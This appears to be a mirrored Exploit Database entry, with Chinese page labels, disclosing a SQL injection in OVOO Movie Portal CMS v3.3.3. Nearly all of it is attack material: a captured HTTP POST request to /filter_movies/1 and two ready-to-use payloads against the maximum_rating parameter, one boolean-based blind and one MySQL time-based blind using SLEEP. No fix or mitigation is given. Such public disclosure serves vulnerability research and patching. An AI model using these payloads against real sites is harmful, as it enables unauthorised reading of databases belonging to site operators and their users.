OVOO Movie Portal CMS v3.3.3 – SQL Injection

• Exploit Database
• 118 阅读

• 作者： Ahmet Ümit BAYRAM
  日期： 2023-08-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51691/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38

  # Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection # Date: 2023-08-12 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569 # Tested on: Kali Linux & MacOS # CVE: N/A   ### Request ### POST /filter_movies/1 HTTP/2 Host: localhost Cookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495us User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/movies.html Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 60 Origin: htts://localhost Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers action=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1   ### Parameter & Payloads ### Parameter: maximum_rating (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND 2238=2238&page=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT 4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1